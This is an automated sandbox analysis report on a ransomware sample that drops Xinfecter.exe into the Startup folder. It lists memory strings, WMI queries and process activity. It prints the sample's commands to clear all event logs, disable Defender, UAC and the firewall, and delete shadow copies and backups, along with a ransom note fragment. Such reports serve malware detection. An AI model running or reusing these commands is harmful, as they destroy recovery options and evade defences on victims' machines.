      Source: svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364826982.000001F12F627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
      Source: svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1364296546.000001F12F65E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
      Source: BiXS3FRoLe.exe, Xinfecter.exe.0.dr | String found in binary or memory: https://www.coinbase.com/how-to-buy/bitcoin
      Source: BiXS3FRoLe.exe, Xinfecter.exe.0.dr | String found in binary or memory: https://www.kraken.com/learn/buy-bitcoin-btc

      Spam, unwanted Advertisements and Ransom Demands

      Source: Yara match | File source: Process Memory Space: BiXS3FRoLe.exe PID: 7364, type: MEMORYSTR
      Source: Yara match | File source: Process Memory Space: Xinfecter.exe PID: 8172, type: MEMORYSTR
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" | 0_2_00A94049
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" | 0_2_00A9C170
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" | 0_2_00A9D08F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" | 48_2_00034049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" | 48_2_0003C170
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" | 48_2_0003D08F
      Source: BiXS3FRoLe.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: " alt="Paris"></div></br><div class="fnt">Your Files Has Been <span class="xsw">Stolen</span> And <span class="xsw">Encrypted!</span></div></hr></br></br></br><div class="vl"><div class="Mrgnlf">All Your Files Are Locked And Important Data Downloaded !</br></br>Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You .</br></br>If Payment Isn't Made After A While We Will Sell OR Publish Some Of Your Data, You Don't Have Much Time!</br></br>Your ID : <span class="spnn"><html><head><title>reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentp
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe, 00000000.00000000.1257811411.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000000.1257811411.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: Xinfecter.exe, 00000030.00000000.1392310632.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 00000030.00000000.1392310632.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe, 00000030.00000002.1394748759.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 00000030.00000002.1394748759.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: S-6748.bat.0.dr | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe.0.dr | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe.0.dr | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet

      System Summary

      Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AFC860: CreateFileW,DeviceIoControl,CloseHandle
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Windows\SysMain.sys
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 000A15B1 appears 83 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 00041BD0 appears 69 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 000A1B70 appears 64 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 00041940 appears 31 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 00049B40 appears 64 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 000480D0 appears 33 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 000A157D appears 186 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 0004B8D0 appears 48 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00B015B1 appears 83 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00B00C3C appears 68 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00AA9B40 appears 64 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00AA80D0 appears 33 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00AAB8D0 appears 48 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00B01B70 appears 69 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00B0157D appears 186 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: String function: 00AA1BD0 appears 69 times
      Source: BiXS3FRoLe.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engine Classification label: mal100.rans.troj.adwa.evad.winEXE@118/19@1/2
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Code function: 0_2_00A85920 PathIsNetworkPathA,__alloca_probe_16,MultiByteToWideChar,GetDiskFreeSpaceExW
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5760:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: BiXS3FRoLe.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="8036"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="8036"::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="552"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="620"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="628"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="984"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="360"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="356"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="772"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="792"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1040"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1092"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1108"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1172"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1216"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1332"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1372"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1444"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1576"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1640"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1652"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1712"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1796"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1804"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1928"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2012"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1980"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2052"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2060"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2132"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2184"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2320"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2328"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2364"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2396"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2488"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2508"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2516"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2532"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2644"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2688"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2856"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="968"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3616"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3628"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3676"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3900"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4260"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4436"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4468"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
